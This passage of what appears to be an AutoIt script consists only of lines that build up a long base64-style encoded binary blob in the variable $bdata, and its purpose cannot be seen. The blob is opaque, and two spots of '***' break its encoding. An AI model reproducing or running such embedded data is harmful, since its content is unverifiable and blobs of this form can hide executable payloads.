	$bdata &= "1fzDaAEj4VMakA8BIAy7PhwCtq10UitVi28sEDBkQCjAb5H0JV1b62tDSIJDHyyDcFMhGB4efxtNAqzyMNXf/Idpz3gYj9BRH5dp20ARW1IfRH4QKHznkOeHwFAQcuQAGB0QkqPRAcjOX+BJtA5qiHDkFAPcTJx7mHC69MPM0cN8amEF8mp7w0wGyaltH+B4JAfp9qAQDwxDkydz6WxqVlAkoTGA0bTMpWQD2whXgIoMtbnMJqFhh/jrEGpAwyZXQsC0xjSWfy18Q9uz/yKSUrPjH3BQbWjjP+C8nCogH+2k7aSTPCfZ7SjSHIDtPUCFkCg/4T8EjJIUgDtfcFWh9nR2A4kIaNaAo3CycLYy1C02gZWmwRIuIOI7pfgIdJYhH3QW7YxL/McaGLXYvIsW7BIbre2LgoxjenUtCOPjAPB6PBRub01FVbs8ASwBzJfJDRw4ADD3DvH96DaLXSww+Il4F1+26i3JdF8CaUXEEf/dyTx0cIPFI"
	$bdata &= "LN+25pUg8gct6lLHKrNEWI+BWCgWk8mLgcNByR2IGRB39ZDbhrszwZo97IoUSdcVubuHPYARop45DTYXIelES0cmKKwREAaYc//D2MIaxuoWRbQM6hSP4ABTOwSnoTAw+ojCaUGwW9c2MCBwFNfId4TY5736zlqREm+gRFK8hcEdA1XUxzcsiE50Tx4D4PhQjxURDsW9cuABA6QWYMtcCxxpmSVl3ZApgWpiE6aD+6zBkFVHM0gcDoteRipEHPBGfplaLxJEMMT9MgoB3QcsyQ38sG7EWoPUlFn1oxXn0ZID0tc1UFo0gNCaHQgBqTDnR84+wUcNLCqML5WJBAjF59EEATN0qOQgQsLT0aDsZI0iREX0yVjX0hofQ11P+m+NPCOMDxmySLPjV0oCY5J3WMczBY4QJiOAOFxwWkayZ6MiYLTcNFdfB5IgRj82nElYqJ/IE0AkUcrUX8WafH0LSsnKRQQOYJ6lFehgTaIE4QWj8SE/osC5X"
	$bdata &= "x6LABwN4M8zxia628+0E7jLWYeNFCzAvPkgm0f0xiIXCL50gCn4SQSFKrmNKm/qYtYLOUUV42DvBL/4XhIVlGTTDFbUGAcAanPeebzjAtclw64Fy/ofCfOWAIQ3CTN6sxQVNlaMawPH2dDgoGN1d95mqYd2xMEMDg0tJHQFllUCo8wZvxnbBIgzhKXTF9HQThGaOumf1Dp0q314SJ/x0EwAVEsTdM07YlRLAogIDQ0POugrTKmQECAQD8J***H/jQBOJ8BcCRUmQmLGrRvCdc/QoWgxAfboYnUCf9Iw1/GStQRmmKiBbFbq6cY+kMHJwvU6APr55FsUAHPKBxgYwNiViwb7JAiQWP/eYkBdL9LH2ra8mFEGK81H2EivsUgPy5QUvKCLXCBZz+pmgvBEcF/BHsqNvSwcVd1Km8PzHBR8EERj7sHpxshoG1013VGCNLXZXRTXKo7Z+Br4lAsw4kDMiDB+wIgOIsTclcLVtCdJNGUwVvqwT4"
	$bdata &= "Q5H2KOXPdHhFXAeJ/30QQi0OB42GFFXRF34t3oUOjhZ1QH8QWC4fmklRftl0bblc9CWUtkiHYvx6L9tbeRl+/ZV+ZaFuSWFtfVORVQiAf4aCF8QIZFHUIAGGsJuF1FE2DWDo+fgYQYAa2STjcUHTWKgMIW0fhUAhXV/wyx0WEdgrhOJPF6zBA5O0103bWayF6OMmW4CllbwNbngDNZFfPyAYdgpo7AMYhoU9XNxNaxwW9xoOZkoONnz8ICJIbZGKkg/gIZLbaWlufXxB8AAspNWTDlzEqIT8xMQLDeHUKh3xt1YQ5X41xDHVf5ixTPL++boQZnyMc/H5oBFER1gV7LDSkOYSCgFedZkV5iBF1ZtrY+U5wMR50lMgUE2sjIVECcYCq+DNLrSMLDiXhdUdSd1XfDHog57xDL3fX4glZtV5vk7IreU3vVXUAcFbHXHy2sklvyl8kpvSnfT1aA8RAbgjfp4WQEsXf02CkkILrpbdAk+9RQQTR"
	$bdata &= "UQrxDYOf9X+BIsAY6p9QQMAOk3V2qQwATTIgEPkPsnaEpeMB5xOpbdBqSBFnMJLMT9nMMACM32I8iHmwB3HUQer92woIRSAVlzlHGGiws+yXIUDQqd55SbGB6CRFF5uVTHCUglcxhQxBNwN1JE8BL5gAY3dRUwXrBgk/2RadJnC7QlY7nmwgxYw8602wUn8Ap4N7KFXrS18Uws+BB3Bp6R4M5XzKZWqDc42LAUMjsRHNzlMT8nPPDusLUElBh6kv6Fi4pUwmF7CChjmlXPEVDqAFFcnjG8ihhMr3MeTHYipBLN0UucsC1oOeAvNcoM/lCwLqfERoJKg3DLVYJmWFDkM8AcRkjHZDf98KJHsp3+IagzAQAf8INzG3jJV83cgUcNc8BQxWzdyLwSIMEg1lj35l4sqnzwLwTNdI8hClBk+NaHyfpnQq3OdV4zSmBq7hg0A0oBMWItjHKOjDSDjWAaMlVzl2Wxhr6qhsaXghIIQbAyaobCQQH"
	$bdata &= "xz7xZpp5AIqY38BWuRpBoqIAX9P6kCOAmYF0SK9DAMCf4wPB3II3XLdGGsqebp+CAgBg9UkF6MBimqQyFQbkgrMnwKCJ1gyAqyhsIGrlpAKnwipTHKn3wjd3ZtApOQIbDkBXDg/U+AAAKz2KAQ+ANFwHOoi9GHDE3HCcENAb4JfBlAVxDeJI1p2ru+CvaDWHcOyCgZ4cdxfBwxI9JYnA7idQa0eHjTEChZAlQ9UPVpT/ga+NQy8hBSjYS0CjpBG/ztBp7Gh3nMSd0RVgH0KgMXHAL+tsJHYeA4pak7xYACMIG41+cUAXFA7TiiJGU3Fkutb4vhPbAQIu38PsRKLUSiBOqt1GYSBR8Ojymy38Xt3ZjYXYMdHLIYLLkC4Ev8M8gHkBLEviwd8Ew8gvAXSDpmU2gcnuY1zAZ9Cmyzi3pIDfJ4jwxCgrg8XFWCyRbPfYmAiOfccSJ9BaACLW5fUABjXDspwjTcFVvwc02gSL7jIUj0LSm9aaG"
	$bdata &= "hP/hWItR4IUGhGPhn/0UYGPgY7Rwx2BtVJEH/RjUNNIlcxMMXnBAc5BBLf4pwYAQgchSW4oQ45GPkorIgLQvAtpf7rOAmfDAisdf8ZgEEIqgwRMnbBfVFeGwekXP6B/rJ2DBj4lRaR76zrCFP6ZMPBrxxo0iCgzs94OPBWjAfR0+NYwWni7oIGeA0PQRURzYjJYhrGNAGw0mUmqSaPPWs3Ylv7OUy26k3w2iX5bcT7LDQD6sC6AntgxziQCw41pfg9gsSSPqMPUNmpkM1MYg5liXFz4x0ijTw2xsQBOeSCxQLHnAIwvJRZFLmw3IVcyRS3AwKQPZsgJTn7dAyNEToErHXBEqYopFnSQNIUM4ARsZb/hDznBOLbVWEiGmIVvPaJFByG08Ns/YbzJBlOAhkNhQTRFRYYF6GoaN/FwhbCYZ9YjbSQzRM08YBC3+MQBMBHhV+DfSiQBNXYIpjXnBa+dRjnOVsQfXwPhnyxLi29eWaB8DPAOQd"
	$bdata &= "2LgYIR2HIvyvP/i8GFBCA4g+AwkGIFEYdwOoEVEZggB9SrjsHctrfELyUCrJGVRfQLSgRVHZ/AQ6bVp+zIq0YX0hIxwcSNk4F9WlVRu0VBHi0LM7+5ZFkN867lIoUGDABPJtwa1y6u1BypQ2tJMyTpO0C/yB49EqSgiJetqRxKAr/l0mDyf5Ba3iJMIT7eCN9SWxm0f70dSVWhz6xkwm/RQDYMocQk/gvFT02C8IPrG4gOTBy63IQhB8MfjeL/ys7kf5/mQEXHIrYgOsBwOPAIhT+mRZeQSmm1gLD0eqAv0IGGDv3iAQKfMsRmbqIVSSbKDQKSjPDglOQFoHhmnGAqTGf4zu/dEFLDhAPGTvD3CD/Zsf7/FRoAamzQ7aFVGsfr70N/dkF3w+3z4eAcMb+5O1CA7wA9GMPh6NscmrnQ4IDAuQMsOUHPeXf4QL1rH9gYbmkeypSLfxE2ratfbctiS2J7l2uvfm8LXxXWxAPWO***BfPg9zm"
	$bdata &= "Qh4g9kxGtLGQBi3vKrVO5OrgLzy7SPIB26n/Do8D/O6v2VR+dWgBiAN8jQxICXlBc10iAk/07BcyDBUCEYEsCNsWMgxXLJcxLoapYOfsiRe1NQHbw15od8BtDSI72QEyMiGfkQrgg5zdq+JrgIbdO/UBmlhIh1F1HInEfq6YAPM77vyn/CTrg9VkBfxs60K+OJ4sA/0OEd4gcQxwxNs/mzBSfu5WRFJHBKkzacyFkJ7nvQ3QACcGPg6mvYN5z/NsARxVBBAGbG7/o+fU7KalAAECAwQFDAAGBwwAkJd8CAwJDLz3vHcKC/ZlBn/t5gkOyOc9z/ODmF1LFrGAEBS8JwY/L3BgkEwfeGcpgEBDCABdwrU+4A+F1mUgxlDhCShFfiRRICBNkIgY2iU6QJt4FlLgwALHh4sVS7sIBtJoB9UwmGQDb4DwnxUWcMXNCDmS0AVS68dgAalxp1ZKU48JKXUo/T0QhPaJAcER652LoM4GwXXM9qzBV"
	$bdata &= "cK4f7xmUjMhVSAE1Y2LHQk/aJRnhvtgtQswVscGJxYDqJ7hZMPC+yEUv+5MdRAJD+d+goa+NgWsuBNc05h6aF85QRBJBNVsnPoICnICyxIiEN0XJqI0IRoCclcFtFangHJncSR0J390I05+aN5GJrkAKMaLUkC8A4FzbZowaSPv3vCPAAODLm5sjXEQUDOwC1K6FF0LVr1WMUDYBj1HhRsEv4whrA34BowPt0bwThgBNgP2nlc/zP8/zzrq7pTzLF3M2Nc3E1DbImZmO9FYQcL2dwd1Fgz4dumBLAMJeWkWCR6Ni1Y2KU85mg5CzsBfMBRciGkEUR9vY+TFVjOEUS/fRrqBv1MqSJjYeMMfdN8AIYaQBo4MGDznUkuYGTSI9xRGJCiOC0hplX8uvK9AR20CMDOUU3qhLU1EU72QDKbS/x2tUiIKeJbQmyvAQ/rCBz8zUQpNiR4rdQIvvV91Em8aOfw1B4xjXzopdcNBIN8GKXxV6Y5K4e"
	$bdata &= "kswwdJi40Z/5ThG6xcfgwCdQlHInAS0Lj4DgKbcCFXDcc4EBEYwz9ugASjZptLvOEGicSVg7CLD0qnf5+yiZF0CB5qcOoiM14xm0LuDN8DCSzxlWppASCsdchsiD4IdEEsbwhvODzIdRH5F+oRJKBylcdpMtVk1pDZ1KhNbD+XGWCpSp3f4FwqkAEC0XMcUxkLIhGFCWnhkozsF4FU8k4CH+Or12+SiMUI3DPbWf0/lKz8Gk8DClw5Xhx0ZlP3PD3VK+jEauxUIy7TDsbUrik/xC7T3oCIKSqwZdoAMPZ9FQDhJM2gEHUOpYoiGgRelAh4ACWsH+Pbwseqit/JOmG0qjN2WhYwOiJ/UYAylCG7hy1HtBAx4E3f5DeKiIckVnkiONPEwe5Q9keds3D+KS0DC2z1FlzTYT3Mo1MI98wMKiC0F0c8eDqtyzQzDyysgQCWnXmUfEV/5D7ujDwfsnnujO5UAwqMoGWEkJPuVNQAcSUdV4ec05J"
	$bdata &= "oBqEDLN3Z+MwWFUQXGlVX2yS2zDtXR1+elJF5EV8DugJTw2gpsq7CYnaJhtQvS+UFE20XMMgVfDlD1/980IkkRtU6PrwNxwvw2hgJDwrveA4F7ksNXLgj8bgCW1I5wHPuoAEiQRAJBmUaGaXHH3OcpcAJSJdqCx0kTMFusjRWyexhg9szsbCcO7DbdBaX8CW/LVCJsNBeX8P/5okkDuSgVSDVppAI7NgEyGo4+Fo9YpwwRfVgToxxpkK5RqoFZJXLDwi8RSLICqx8YRjUBaYRdvASLthk6wnqAw8hrlAo5SIbXyIYBTjkwGU74Emrxw8OiNgAeIIlG4O+L3USnkE20m4KbKC2rEJ94As2NItFvhjgNkwHWlA4CZaADj5VQF4GqlFlBdqDGGBeiuPEaT3MgqFkIH/g+XE5ZJIpiJyIHjIxcogwfwAcpYIQWAz2ZYDAnM3SaRAxQiFkEJibWiSnIH/lADLF4WFQMR8kwdMccpAkJBpNxcIH"
	$bdata &= "V8NIET3D0eoYIlg/ID9Exxc080vmkJODUCCAILFCBpIg5hOMkkP/5UAzz2SKwHQNnEEQoKc55NAQEA3EhmCHXVCMa1iZKvcIEnqFG0gMXr+jyR5BVmpulOVzoIq6lImhGRQgdb8y6WcbIF/iHx8S3E54UYDhKTdYZPcA35pmOLtJGgPlMAH/UdC7slZ9DAF1Z1MAPkJPwV3sI/dTB6NEtB9TogwIBz8BOgQLgxQe4UswHk1YthmbPeEiOMv/UGYOFWhMpU7A+wlS6xJqiaO2cAcHmErhRiIkjIb7IutT2JQw7F7hLUOmB+r/UnkEtw/O71NsDAbIkWoBW+vBWWC/GmoDdRRFN0DdsA8YHKxCjD7wLN6DplgeHp8SxTIe3G0Kckf1dPNd7BMoPxS4lmvKLMNMvsThFmQKVrPrERQXavEr81ecWcraCLoibyoY4h2FFhC36WA8KGj1jBQ2C36MAWBQBJkY3ESC/2AQHDfHk2boAsWJsC6Nl"
	$bdata &= "fidWxBCfFgu+4AypRb8YGwX/7UzARIDt42FJ7AzHz58PeseVweGIPBHREHXLjoEDD/itvz3H3OAjcnLBnQkwwulgMdLQFzDKt2c9GygjXi2mh+6RGb1AH7dwxgIRoySWL87bbriB1dUNPxQBQfEkK5ce8wm5CFvM1gIxShMSYiRScBqGIQFiK7yZBnFkSogeVkXyk14NesCsDsMVnQfYryxJV1dncP/6sYNXWAHK88AOer8VDBZW09UAAm4gpUFKQK5TH29EWQ0S0+cPDsISSUd7EiTQKVhrywYQdZAWt7bAhK2HhwK1mIF0M9Ct/QpqB4CiB+QNIKc8gz5FYp6iaV0fHQHSCb2dFmDOZh+GgsZtBEDloimMoLufVmRL++S8JSL+PCF9noli1NRX40XlGYEcbXRg22G3A6JMEIwZubXjCH4L+IT1LMQmwVf+GJlYosGsOXcw4MYwBnw2o+GRdSaFX3XJSKbrwMW9c3o45IwCsCIdVOic1"
	$bdata &= "w9UflIcQgjcUK5Bxg7HUIwwYMWAgqq0f2FBIXqWUBQFFZRaGFwcBcUAF29Bcdh8EEkxmJh/L3EkLHMZYgFoqtHx1lhF5aYg+bJ9Gir/6AmCPm8PLqwyFcfeFMiRstJfQOGzqgDfGpGCG5xCJoRKpwEzNtY3FowOArEiBgMzq/vPlZHMyBRXGgc4x2tW/cJg+kQ8NylpLkNTSy20M3NbXQgCBZ0FCJ0D1B0GBI7CCOJ8+v0SA6OG3/r7cM9/BpwW0bRLt2W8SrN7SuXDlnkFA1mgxKJQ9YkQeeGH4ExYV+NSHy/XS3o0jlRJDl0Lw4MfRk5UPi3V0UZpYlQkAZmiZmMg00IEei72oYJuYbxXylsQONQgI1N+Gi0DiyKQPxIEG9U4NBmAmZuEmQihMNP2RjxrJgCNLZbw0CHXx6p9qEgxTD8es6ssDMTQNVF+MJIW8ljBWgYu1cSiy5AUeZ9E5JsUEFED2rEaGyNKgxXTF+/T0gIBVH9W8a"
	$bdata &= "WOl4VO9aGdvh0/vJ+CLkZQBgSb50GQCzGfRu6Bm0ZN0nIBAPC9Fy36fnGxlBHqI3toXMKT9yQQRhmVjL6kfgLyH0L1aEiwXiCGVTh4Q0aCUbfC6cXFwhfxDNZUejPfh1giSV17xqg/EqDTmg5TdpFGMrrOkBLHXd7W3M90MG9OdkLF5ylWQ1sr/10KlcPtz68y5EUDlHo3vlM0NybbTOajO6AwCjVjQguwSG0AXQMZV9RALzhGpderTLASBP+2gyWFwuowj3fsAFWaZnpPuWrOHXwLz44FGnrGKW2g2Xn1D+h/Jsa/4TAIjoLGGYbTYJxhrkb1A2CxnTD+XXIKRADH9wDJE54CQMbaQePQMMz6fUfi+kQXSPs61s1qOgV/00Mfb4U4lKEDhWhXLIEOgco4RnEZ00XbEOcQRavG5ZRwB5IcuNYTGoXSHxX+f8CiWrKw/f7dSEekXXt/3YIBAR/3g94DAKJr6H3CIgdMYNHov76y3UdLgJQ"
	$bdata &= "reLdZ4oydmO3U34M6y5AGL9Azy8SL5D4TxDGC/j3Bb5QR+sOfg5nikszqh653t5ksyRemsA07ybz6IkL13wSuXPBEhXfBrrrCCJ9A2BYMBjgBdryboUs3Emc18MPjJ4N3D2CKYvYjhuKgQsk3D4T0y4EkYJRIIPNSii0HrIUgEYHjPE42AS0YJb/AA+lVeNNNleNHBF8WEF9gx2UfFS52H9NO9mX0uAb3Np8RSvDGrz5Fpdg1cHnVgPHuabo7+1nKuoZNsHhAuwUmFJRPc0avgQWEfopktl3xC+tHVWB7CtsJPyK1iQSu0wMWDyqVM74I/FYsFA4DpTaZdRqEokhm1nTSSQSHcnDzRIPSPnbBDyMYYnEJNcrLptPItlTdTxFyNSSXFA98JNI/DgUV+7sV9VM2FHzT/AB7eKZ0LHqvVACAvglBIkA0x2uGyvCGKDRJi0LAg4ORrqCxFfx0HIJrIgR3eh1X30DTxwHPMmNRoAxYIJjtfqm/"
	$bdata &= "gCPi0MYVrHJQzr8qnQloGeV1O5PgAh+QGyeuLndVJP79uxH4dQqweSAzG62VxT5vGicIUDNiwjgKf1yV3REckCDqdE2POkMLVCxSyE6+YR6togeIbwAKwtGCFNTT4QtCRHcPBKW438YTYgcMOvgTYMqCc8V+fBkw5OC0/o5fSaNRhR6rXFeK8Ji/+YA2Q8k+ok4x27TXRLor3B5dQzmEUs+bx5kDHQE7tEouI3hXj/BD9AAYxbPeN5AELShoIECUWYGFAJig/gWiYCFaNwJ7kEQQjIN9CCzDhrAKy2Mg1SoACJkyg6jnKmccCkB8q4SPyWxdWDWDyaZde6w/zVBS3wjoIDemUlGjIQNiF7DoUMkPuRjaURuke4TIYAbhMCSbwwyH4h4kOOKB9dxhLESQgEO+24BLrtuIRbrHgJYXtDzWSRSUP4wqYDDKdmFrNApc3iHXLp+ZoOlqvcOMTbdyqhoBQpeoFD3Wr4n6lDOhz+97mc0UvxvK+"
	$bdata &= "tzTIK60brMiAqAzIDui8t2UgyEiJQHfZzLryjCiff4LXWo7J2zFleUAzUvYm77A/P/dSI9z3OrQYX7B4OmD9aNgV8kpbyrdF53sAEujMdwy+cC4CIzAgeQQTQm0u4ECR5mHAAgCMITGgI+XjzSOlZBZ0HUiUBQVFRMhrco1wpQm1ETD/Aa19ip1JmRYEyVIROAQ1+jdkIn1t+3pDemadxXXdwFjSsISP/JRNVXlYpIcTJZqMQb1SxHPFr/5JJr3VQYFxwgDjYmuSRGB31kqKjrIEwO5FBagxHvrSxZxEToWDCQNsB5BoIYNIUSJBk4V84hdYPEocvRPtNwZ9yFg0hE/wZMRgCuqrRISmyTeCXD2igA7iOJ1mpUmQcOkcsDI53cFjEG0QVDNsQz6cPh5gwOhoIPg+RoSGRc0hgMAMYblVbp0BQWXFZMPoOAK7gex0Y+xdi2BlkaSAQdBp6Ij0t4jdPGWSibXqbedAlQt1VBdCAP0nQrtBG"
	$bdata &= "H1zB4E1gED54VdiPmbSMctJTPbgxfbYYR+FBsQsYslimE4YmA+j/Ws9yACRqRZr4lZzDQXnWNJBDuNZlhMS+x+I1NJOBYJnu2OyzQADPmOHvHiy4oA9/dg8E0oNv00zRN61kUBBgcICRN0zRNKCwwNDg8NE3TNEBESExQhRNU01RY59O+YKAEaBUEdLm0h014fIl7CoSIl8vlcoyQlJiccrlcLqCkqKwul8vlsLS4vMDlcrlcxMjM0Fwul8vU2Nzg5Mvlcrno7PD0XCovl/j8AAEECMvlcrkMEBQYuVwulxwgJCgsl8vlcjA0ODxAcrlcLkRITFAul8vlVFhcYGTlcrlcaGxwdLIul8t4fICEIXckstczfeoLkJMcUnYQ1YJFyXYMO7RFKpVKDJX47JmKwJn2rY1eCrcCxswbmaODlxq9gVgwnwWKpFuUKaCgVIF5AaAaIEsUOiB7BPCIRhSXqgBsUgciQwTrIQIQSrk4BWEz+6HtAyh8"
	$bdata &= "w4v8RvRDasIitgZ4MIZEGK9Z77phiVjHBCSIIQg7Y30CvM+wBH4iJSkYcrHtVWZ4amSIwIkBSQWmb2vyJ2i6XlXXiaPQIVaw8U2tg3xU67Z2JOa5QHmBfB2EACj02wIIMX9XdRM82GxA5SkMkPa1keHDQ76KlynItHRkJLMPSbcdazaDeHzwBxg8ENSAYSQTeAUZVf8/ISCHAT6O6wSfm3LoNA/5SuyCWcCDlcZa6C5fcKGZ4YP//7CAqyFFPbJhQBm3JxOh1EM6dRSnPGYB1n/wRMMDKgRgOzMoHKW1w6YBpoTuHAJ0LuaCsA1kZ6M784TgUwBDdhafO/OkQwR86pBvYnRJhktuqrEgllU1GqsGtpClMfULhln1OLbiEbDAAJTZZKRSGoAux8+HK0f0DPV1G34ptg3QtYB7nxBgHsYQsAp06xUsEDDcsGlAGAp1xCvnAP52eyMTDsReZPeYsNo7M34oQl/c8EKoAt5aXiO/gAOgtBwdy"
	$bdata &= "hE7kwQ3pP4m5GB8SUY7D7FJMhryI7GAJJ8vr2T/HAEHPMn86ouFqKi95LHBQ1HcRYBhbFmlDXxYQJBQF6CmDJSgYl2QGoQM4DRwJc7BIXWIiFBTjC3yhI/bdCModRhCCLKF0XYDbwmNGvzAB6iCZh7+jXd4g2WMALgW1owA4M1anLADBQxkiQb2hbV+Jl3e8IwRg+AkM+v+fgF2EYPA/Q53EIONKyCYETAWNtFkpp6UNQVugIhQEF2Uv1LhBI2CmsO9s/QmCa4HxoWX26I1Aq61ZQ6ABIQ9DEDDPSTk+EDrMMF8EvSCkJILZ7AEh1KQyxQVi42cuFIPV+ozzVuLhYBJ55wAuvs1IvczC13/oltv0AC4DZkrPtQAqgsbNh4HUTEus6VcpGXcrfDYKGQpfR0oRRAPbeICNANKdfBSxyO9UMZWKU42+OHrXT0lx/uouG5oggyMQZU5AJ+AudwQehRcvWQYEU4YRcavqyjKBDgdELBXlAI9iD"
	$bdata &= "u7CvSNkxKHtWXWHHl20FdXo6AZoOuay8ikjKg5saAZ6u9Psaxe6BukdK8PqHSn/Bw5+9gW66ErdZl1kY3GBc0lARshAV+LoW2vYcKLyQQq6yJIyKwDuSxADdTQQD4K96/QvJSIK4neisFbIlxjNxWhgIED2B5mhDHhrBR6XgiaiXawB+0I5dJIDEAWm1CdAcJdrNpCO8LZawT0dBJQUvj/J0fCl7S4w4rkwlewQYcoIrlYObLH5CjgIygCAH34x0lyG0hGk/S7LwR0BH4/VrA4W1f45jNkgDVthoELBGM460xd/LRCgFEG+PRRV6L8egaN8z8ggATggwXrlDms3kXwr5hEt3YJiOfrUiETmdTWYON6qFJGtx3grocp/HS0ULFaOTuselIg6KGrNEBbya+Y2lnvDEvEiTlWWHVjoJu7eliJFS3QWDvKFKAH7D5c6wYpx+APcJCDk4VRdj4QgpN7kwCqWMYDD3SUsK7H4ZdwRzwJMHAaae9"
	$bdata &= "APDppQIwNn6x9ZF6KBnQXCAVag4BORACieCZpL4/RKynSUJwwRnx7DPBMhKGDZnxK+i2JC2yZMhGLcNetwBIul7k8DPWblFIwZP8liESO+groU/fWlxgUntKWAowooa7zMjZuSAP/TnRQg+4OdEu1vgjxXPgHgPw5Wgx1AUZE2wNwDIy2AadlrjsaeDMQ6lZoMBA2MrDa+u2FEC91ClZqrIsHTxWgwWwQwz5SVsa1DNJDF8wJCB9eABCF2wh/PQhvSPUMRteovtYLOBTEOORMCXyr5XgEdCkdjfShwz2ikrOS1X1sMyR83OTrC3p1BoNSUnqKFhheBg10AMz22VE3LaWDF3ShCEBPKPWUJfEKuGgPt0jKA8i/EWf04HBiZFctKLDt8Gl4yGRaRnByj7MfZXLaEBhXADaUAfiKulc/wn5Cc3xDa6OtWnCeagJUPc6N90fUC/92cHUEMF6AgOovvP4yEQiwARVMw/sSbQ4QNdIdzlQazz1D"
	$bdata &= "bSkL/QJ2KaAJZIEcSEgUDCI45XdsgaI2GDwcCL7j2o0J4cXOQXUYHngg8b28GZC1ws3rEiRqA+HBXSKhnNBuV9Fmf39qKos4DYMgAINQnGhi97T7AxIIJOhWmTMCO8oeIa7YWeQPE57iI+H/8BhTWdYdS8QdJiz7/18JDGR3HN5zD3etKRzYEstN/HdEC7WU/hmk1vh3f6IBeGKQLmb/Nl4uhkAbCRocjKHAmalITHz5sPhpg5Y8qHQWY4l4fdgMbI52fCwZbFM0YCk8WbvPBUY44TVyEZeyAxD4QMIwJXtCCU2fOMTwx2jwIYJGhaGaap5ZXL5oiUdc/3boFfgLaM8qAMJ00XlYBkomeHwJ2QE8djLPtBgBoMuBdiFqXHD/hToIGOH6V9K4tC2J0xwoA3iUHuCAuIkIEATw/9aBavZwAXh4UCzk19NnTX2AwCl3SGKDr7orHuwKBMHoCrv/RodtX/vB4AojyyLJKAvBak3kjKxMtM5a5"
	$bdata &= "ErIDpFcGOjeTai1WfChdDCrckvMmo+F+cej06x1QFc20Apq1ObRWwUGUM7/BMdEhcjCDR3frLsAUL6g8ILGOITSuoUfAAwExXgfGjxwhS7HwEY21ymAhu4deg+JsQB16L4ZygMNmiRTQzT/NeEIIpYFzpFZGEm0QLxQXrRkBQugmtxQiMcmzHi+t6pJIF24btIcohRU5JdBQwUR8QzIYIIj/DqgOnHg8II72xjdgeF12RrMROXIUeAtrNvi08U07bUkPBvyWKATTog4UC1B/S4CFZwQiwJoZjlgkXeaEkDR7uzhEh78jc9qIF+gmFMr7iFcEchq3Fh9mLRttGlUoKzoK3W0EpyIINC9D0MtU2BQRDRT3ZmLBC4DhBwXOcCiHSZCrH4eaLXIAjZ3CISLTbgx/1yu32Uo7kY7dfB85g6EwKM3EuRhlovDAElehMUYATWQCdDfyfUULgwllDgeqH3k+MGN7P5R/3BED9w1B+laIH4xV/zsA3"
	$bdata &= "TM/mGAxp6kpI198KUxpdgHHw0YUKQINAlZ8jApwAI/PF6AA7I3necvRGY/kgu7TH0Inhp4tHQOBbDeA28EYzZZjuvjQiIIRpuhGyV0Vt/XS3usO/CHou+JcI9EWJc+WF8sEciGcwQbVJV2qnx1emDeaV36SyxmEpIMkK1Tn/ohSHOjTN2pT9OLnE21jAv9bDgAAkQMrEmdKcEguzQQ3uda6L8WXVAhCFrL0LVbuATUdCHBMDuGXy4hGOkNiCXgONq5t7ej7/CcNA1XiR0h5AlD8i2YmNLDpkRJ2hh0aN4PvIYlZiIHg0AkkhxIwUIQjAQr8ZkAuRA7TlCaWBCDanCGOeIP7HYnJyftGw5UYGRoPl0MLMSJXiwyOgnI5mIGreTbU+D0uRwDJmg/UGATyGayeWwgQ8kfM5C5i33sU1NUqUNyAjoKGui6gT3hf0dBsz+VfA2kGzhDVqcQiu4RY4b+HITTNcPgUZw41AbDIFMGVVMXEqSJdhT"
	$bdata &= "ZK4wNQD47azJ6ASpJFMj0C1YPh903ht78PTt3/1UUPWTutoduD2IIJRQPttOGe6YYnvIw/yo3AryDzCeM628hwpy8e2eeACmOLllfPU3zhT+LdfZHViDoScAgrhyd20JgiJDrJDkqa2F2D2Bh3v/bvg7Bq0O4HtzDET08rQuOHOzir+d5nucGt7/K0ubP8zyb9zsPJ0RYYIgOWAtnEv4E5tQ1EC5VPNRQ6u39H5o0ewpOwQri31f//+2BiFIUPJ5q/VNWdXqLXRCDXb+yiWUAdMuLQzpFEir1jBCYLHpXegN48wvCdwTrQ+tEkUjY/yE+OUUIdS8Uy0DATqo+AusiBr4B0VMcWOI6UyhDCbTpDZDKSkgYTHuFfxAQyGm2iz/aWA+K2KVo6zyITNiIFUaCpliIuyc64LsO/yjrFRsfCa9NUzNaCrIBRXyY/1jk1proYDRjX+pX2ls4VHDhcBTxr4j/Rp86a+vfuEqcAoCpeViLLt/Qwwp6"
	$bdata &= "CCQ+ag0Q2BI7TwQqx1AgqbNH4P1GUzQxl0rh+44FXmc0C0hPtQ0UHXqYICCPmnalcCRhFAQcGMChg/hXWFH/ccZqDbYXA+Bqq8MyhYz+sqYEmrYZb3xOCAQMEAbsQk8Qxt8YZR5Xhs/uHKcoQAcAC+/kMGRg5kicKf8PMGtsDXTDVaqqdB8Kq4gzlHV4AkYgclkQhkIhDBxbCsKi/QOB3jEEToRFV+QpXMRN8GQUdNU4OEAEnmXaFLpAfNMdoHUc/3cgE5mimNBqKAglHQGZ1bRfw+yRzi6oZ0q/W01UAAkb7DFgZCjoH2EZCAjoUfaLEwRA6zZUntYbCFMELWje57tVJrDXZkB0E0IotzBsB9do8TFf9fC0TQfxMZYMONB1E3gHQjK/21df9ZupptuMJCX79mo7TiBzzt+gEEYFoFFweD09x2sKjOtsFLUwIFw0gSvhD2Bhw4UT/q6IgewsbXSlqQmJU33cbkA7NADM+1y/OAKAHXDof"
	$bdata &= "mh/Sf/tAssoIH4DaiBbjUP8qlnxJ1hzD8H+lPjRxm7fX22WA/gr+4P/DEAMX0ZYO8iqEw/MEqwOwAfI9Fst4UEA3yoaOBJ4g8D60e7NeLRflAw2jUQ+ughi7P8foRIEBZYPtjKLz2bT5kJm999t6abW6M6IKMIDRez/TXgto+7wdeOcWhDoU/8LVls/sqMACA4oW3URaOPwdwGgfzMAJ4tNdB4kxCnxg8V8cZRKQoiWYOZ9G3jqGFGBIkKUGkiHCO49fPtsC+CESz8vGXQb/zWvC0ZWxTZX80YXp3imIQPYj80oMAKeasPF2DAZTnmDC2rcPoHAEiDrERIPdQq2lfB9CDFt1CBtDwDvBsn/YArCLDzEQKIDgi2CSmswMeoIyD5NNvx1KX1feizqMB5NF2xgYdUuZBcPODwApAZnd+YIC4wocnoRPxKG/ym6SCEgNLAd7N0O0m6CskD9wxroQTOxHA555E6d1lgCKYGjnFoqaD/piXg0BF"
